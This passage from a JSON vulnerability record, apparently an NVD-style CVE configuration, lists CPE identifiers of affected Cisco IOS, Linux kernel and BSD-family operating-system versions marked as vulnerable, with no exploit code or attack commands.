                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yh:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)yl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2ya:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xq:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xi:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(2\\)xa4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(16\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)t8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(6a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(7\\)t10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)xq1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(5\\)b1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)t8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(2\\)xa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3jeb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3jk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4xb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4xc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:8.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.38:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.41:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.22.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.47:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.46:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.37:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.69:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.35:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.34.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.31:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.57:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.53:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.33.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.29:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.36:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.58:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.66:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.43:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.50:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.53:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.14.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.50:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(13\\)ex2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(20\\)eo:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(11b\\)e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(7\\)da2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8\\)aa1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)yf:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5e\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(8\\)ea:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(4\\)ea1e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(4\\)db:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3\\)xp4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(9a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1ew:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1\\)xe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1.1\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1yc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xt:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)mc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13\\)mc1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(14\\)za:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(13.03\\)b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(11\\)t3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15.1\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(16.5\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)zj1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)xr:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xb11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xt3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xr:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)t3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(23\\)sv1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(26b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(26\\)sv1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)ew2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)s4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(7\\)da:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(8\\)zb7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2by:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.44:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.35:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.3:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.6:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:3.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.6.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:2.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:3.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.6.1:p10:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsd:bsd:4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsdi:bsd_os:2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsdi:bsd_os:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:dragonflybsd:dragonflybsd:1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:3.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.1.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.3.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.8:p2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:3.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsdi:bsd_os:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:0.4_1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.2.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.1.7.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:7.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.6.1:p5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:trustedbsd:trustedbsd:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:4.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:2.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:3.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:3.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:2.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2mc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2sw:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)yj:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2zg:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yz:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xs:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(14\\)yt1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(7\\)ja1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yh:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3ys:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yi:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
